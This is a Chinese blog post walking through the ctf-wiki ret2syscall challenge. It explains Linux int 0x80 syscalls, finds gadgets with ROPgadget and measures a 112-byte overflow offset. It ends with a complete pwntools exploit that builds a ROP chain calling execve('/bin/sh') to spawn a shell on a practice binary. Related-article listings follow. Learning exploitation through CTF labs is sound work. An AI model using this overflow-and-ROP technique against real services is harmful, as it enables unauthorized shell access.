basic ROP-浅谈ret2syscall原理[ctf-wiki]

最新推荐文章于 2024-07-05 21:04:22 发布
最新推荐文章于 2024-07-05 21:04:22 发布
阅读量269 收藏 1
点赞数 1
分类专栏: pwn ROP 文章标签: pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pointerr/article/details/111306210
版权
pwn 同时被 2 个专栏收录
6 篇文章 0 订阅
订阅专栏
ROP
3 篇文章 0 订阅
订阅专栏

一道简单的ctf-wiki上的基本ROP题目。
原理:控制程序执行系统调用,获取 shell。

传送门

0x01

预备知识:

系统调用通过 int 80h 实现,应用程序调用系统调用的过程是:
1.把系统调用的编号存入 EAX;
2.把函数参数存入其它通用寄存器;
3.触发 0x80 号中断。

execve函数:
在这里插入图片描述
详见:execve函数

0x02

解题步骤:

首先检查:
在这里插入图片描述

ida打开之后,没有system函数,只有binsh关键字,开启NX保护。
需要构造execve(“/bin/sh”, 0,0);
其中,系统调用号可以通过指令

cat /usr/include/asm/unistd_32.h | grep execve

实现。
在这里插入图片描述

由图可知,现在execve系统调用号位:11,对应0xb。
所以我们需要将:
0xb ->eax
/bin/sh->ebx
NULL->ecx
NULL->edx
如此一来,我们就可以构造出:
execve(“/bin/sh”,0,0)
如图:
112*'a'+p32(pop_eax_addr)+p32(0xb)+p32(pop_edx_ecx_ebx_addr)+p32(0)+p32(0)+p32(binsh_ad

我们可以通过pop eax ,来让eax中放0xb,其他寄存器同理。
从而我们可以得出payload=112*'a'+p32(pop_eax_addr)+p32(0xb)+p32(pop_edx_ecx_ebx_addr)+p32(0)+p32(0)+p32(binsh_addr)+p32(int_0x80_addr)
接下来就是求出各个地址。

0x03

使用ROPgadget工具具体实现:
ROPgadget,我们可以通过此工具来快速实现代码查找,常见命令如下:
在这里插入图片描述

  1. 找到int 0x80地址:指令# ROPgadget --binary rop --only ‘int’
    在这里插入图片描述

同理,我们能够找到pop_eax_addr:
在这里插入图片描述

同理,我们能够找到其他寄存器的返回地址:
(这里我们直接找到了pop_edx_ecx_ebx_addr_ret_addr)。
在这里插入图片描述

同时,使用cyclic工具,可以测量出偏移量:112。
在这里插入图片描述

从而编写exp:

结果:

完整exp:

from pwn import *
lzh=process("rop")
#lzh=remote(" ",)
binsh_addr=0x080be408
pop_eax_addr=0x080bb196
pop_edx_ecx_ebx_addr=0x0806eb90
int_0x80_addr=0x08049421
payload=112*'a'+p32(pop_eax_addr)+p32(0xb)+p32(pop_edx_ecx_ebx_addr)+p32(0)+p32(0)+p32(binsh_addr)+p32(int_0x80_addr)
lzh.sendline(payload)
lzh.interactive()

0x04

pwn小白初学者,如有错误请各位师傅指正。

p0int3r
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
ctf wiki rop基础 ret2syscall
weixin_55885866的博客
05-12 94
内核接收到int 0x80中断后,需要查询IDT表来取出中断处理函数地址,这个地方比较细节的地方是,int 0x80的idt表中的DPL被设置成了3,所以才能从用户态能直接访问int 0x80的中断指令的。个人理解:当出现int 0x80 时候 ,进入内核,可以使用eax ebx,。从而执行对应的系统调用。,(不仅会插入中断指令,还会将系统调用编号设置给 %eax 寄存器)查看到 eax 和 esp 的值 如下 通过ebp-eax的值。来主动进入内核,这是用户程序发起的调用访问内核代码的唯一方式。
PWN】07.ret2syscall
weixin_52553215的博客
11-12 2328
Linux 在x86上的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。在 /usr/include/x86_64-linux-gnu/asm/unistd_64.h 和/usr/include/x86_64-linux-gnu/asm/unistd_32.h 分别可以查看 64 位和 32 位的系统调用号。
ret2syscall简单总结
最新发布
ULGANOY的博客
07-05 692
主要是自己的简单的学习总结。
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3399
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
ret2syscall
qq_44759495的博客
07-04 1386
原理 ret2syscall,即控制程序执行系统调用,获取 shell。 步骤 checksec检查是否有保护 可以看出,源程序为 32 位,开启了 NX 保护。接下来利用 IDA 来查看源码 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 ...
ret2syscall(pwn第二课)
s5555555___的博客
02-20 1271
xo.01 ret2syscall原理ret2syscall,即通过ROP控制程序执行系统调用,获取 shell。xo.02 ROP原理:随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是所谓 gadgets 就是以 ret 结尾的指令序列。例如:pop eax;ret这段代码的作用就是将。
Rop-Fast:快速跳动
06-25
2. **Rop框架扩展**:Rop-Fast在原Rop框架上进行了增强,修复了已知的bug,提高了框架的稳定性和可靠性。 3. **更好的性能**:针对性能进行了优化,使得处理请求和响应的速度更快,尤其适用于高并发场景。 4. **...
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
在本压缩包中,“rop-sample”项目提供了基于ROP的示例开发代码,这为我们理解ROP的工作原理及其实际应用提供了宝贵的参考资料。 淘宝作为中国领先的电商平台,其内部系统采用了各种先进的技术和框架以确保高效、...
rop-plus:rop框架修改加强版
06-28
2. **漏洞利用开发**:黑客可能会使用`rop-plus`来开发针对Java应用程序的攻击。 3. **防御机制设计**:了解ROP的工作原理可以帮助开发者设计更有效的防御策略,如改进的代码混淆、动态代码验证等。 总的来说,`...
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
求Fibonacci数程序设计(汇编语言)
01-04
求Fibonacci数程序设计 目 录 一.课程设计任务书•••••••••••••••••••••••••••••••••••••••••••••••••••••2 二.正文••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••3 1.设计目的、设计内容、时间安排•••••••••••••••••••••••••••••••••••3 2.设计环境与与工具•••••••••••••••••••••••••••••••••••••••••••••••••3 3.程序设计算法说明、流程图••••••••••••••••••••••••••••••••••••••••3 4.源程序清单••••••••••••••••••••••••••••••••••••••••••••••••••••••••5 5.运行结果记录••••••••••••••••••••••••••••••••••••••••••••••••••••••8 6. 设计结果分析•••••••••••••••••••••••••••••••••••••••••••••••••••••••8 7.参考文献及其他••••••••••••••••••••••••••••••••••••••••••••••••••••8 三.评分表•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••9 四.封底••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••10
PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 1582
虽然网上(包括CSDN)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
字符串溢出(pwn溢出)--ret2syscall
莫慌的博客
09-29 764
pwn入门
pwn基本ROP——ret2syscall
turtlesd的博客
04-25 2843
ret2syscall环境原理系统调用利用方式漏洞分析使用`checksec`指令查看程序保护措施使用IDE32位进行调试payload 环境 ret2syscall 原理 系统调用 系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。 操作系统的进程空间可分为用户空间和内核空间,它们需要不同的执行权限。其中系统调用运行在内核空间。 应用程序调用系统调用的过程是: 1、把系统调用的编号存入 EAX; 1、把函数参数存入其它通用寄存器; 3、触发 0x80
ret2syscall 入门
akdelt的博客
01-24 495
系统调用是操作习系统提供给应用程序的一种接口,允许应用程序请求操作系统执行特权指令,如文件操作,网络通信,进程管理等。x86 通过 int 0x80 指令进行系统调用,amd64 通过 syscall 指令进行系统调用比如 write 函数32位汇编代码系统调用号,触发 nr_writemov ebx,1mov edx,13int 0x80;中断触发系统调用‘’
pwn学习笔记(3)ret2syscall
qq_66013948的博客
02-13 744
ROP(Return Oriented Programming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。
ret2syscall-执行系统调用
yuqie的博客
07-14 189
checksec一下:32位程序,没有canary、PIE,开了NX,放入IDA看一下:有gets,可以溢出,不过没有system函数,也不能执行shellcode,查看字符发现有/bin/sh,那就是新学的系统调用。 假设程序中存在下面的代码: 但是程序中并没有这串代码,所以需要使用ROP(返回导向编程)构造,构造方式如下图:简单来说就是需要找到一些零零散散的gadget,然后组装成payload,不过前提是先溢出劫持控制器,这里IDA里给出v4的大小的'0x64',要溢出的话需要'0x68'也就是
基于长序列的自动ROP漏洞利用提升程序安全
本文主要探讨了一种针对AR漏洞利用的新方法,即自动ROP漏洞利用(A-RExplot),该技术建立在长序列的基础上,旨在对抗程序安全领域的挑战。自ROP(Return-Oriented Programming)概念提出以来,由于其能够通过组合系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值